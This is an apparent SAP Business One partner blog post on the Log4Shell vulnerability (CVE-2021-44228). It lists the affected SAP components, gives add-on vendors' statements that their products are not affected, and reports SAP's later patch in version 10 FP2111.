A security vulnerability ?Log4Shell? (CVE-2021-44228) was categorised as extremely critical by the German Federal Office for Security (BSI) on 10.12.02021 with the level red. Software components in connection with SAP Business One can also be affected by the Log4j vulnerability.
Log4j with gaps
The name Log4Shell refers to the fact that the existing vulnerability is in a widely used Java code library called Log4j (Logging for Java). Attackers can exploit this vulnerability to execute any system code of their choice.
In other words, without the need for a login and/or password or other access barriers, hackers could use a harmless-looking request to hijack servers. These are then tricked into reporting, downloading code that contains malware.
SAP Business One affected by Log4Shell
SAP has identified 32 applications affected by CVE-2021-44228. As of yesterday, Patch Tuesday, the software manufacturer has already patched 20 of these applications and is still working feverishly on further fixes. SAP Business One is also affected. SAP has already published write a notet (an S-User is required), which mainly refers to the SAP Buiness One 10 version.
The following components are affected:
- workflow
- License Server
- Service Layer
- Job Service
- Extension Manager
- Integration Framework (B1i)
All-clear for MariProject regarding Log4Shell
Log4Shell is for MARIProject, one of the major extensions for SAP Business One, according to the manufacturer, is not a problem. MARIProject largely dispenses with the use of Java and is therefore not affected by the Log4j gap. This applies in particular to the web client and mobile client, web service and RESTService.
Coresuite also not affected
The all-clear can also largely be given for Coresystems' products.
The following software products are not affected:
- Coresuite and its modules
- Coresuite Service
- Coresuite Cube
- SAP B1 Cloud Connector
The following products were found to be using Log4J. Appropriate patches or recommended temporary fixes have been applied:
SAP Field Service Management
As FSM is a cloud-based solution, no action is required on the part of customers.
CKS DIGITAL leaves Log4Shell cold
There is a global rejection of any effects from C.K. Solutions. Neither CKS.DMS, CKS.ADC, CKS.EINVOICE, CKS.WEB, CKS.SUISSQR nor CKS.RUN are affected in any way by ?Log4Shell?
COBISOFT not affected by log4j zero-day vulnerability.
Also the solutions from COBISOFT ( COBI.time, COBI.wms, COBI.ppc, Cobi.edi, Cobi.msv) are not affected by the gap in Log4j.
Boyum also outside
The Boyum support portal now also states that none of the products in the Boyum family use Log4j software and that they are therefore not affected by the security vulnerability.
UPDATE
As of 11/1/2022, SAP has fixed the issue related to Apache Log4j vulnerabilities in SAP Business One. In order to apply the solution, existing SAP Business One installations must be updated to version 10 FP2111.
With the published patch, SAP no longer recommends using the workaround described above (SAP Note/KBA 3131789).
MariProject / Tool for e-invoicing
cks.eINVOICE -Addon for XRechnung & ZUGFeRD
SAP Business One Electronic File Manager (EFM)
Purchasing documents in SAP Business One - consistently efficient
Outline agreements in SAP Business One
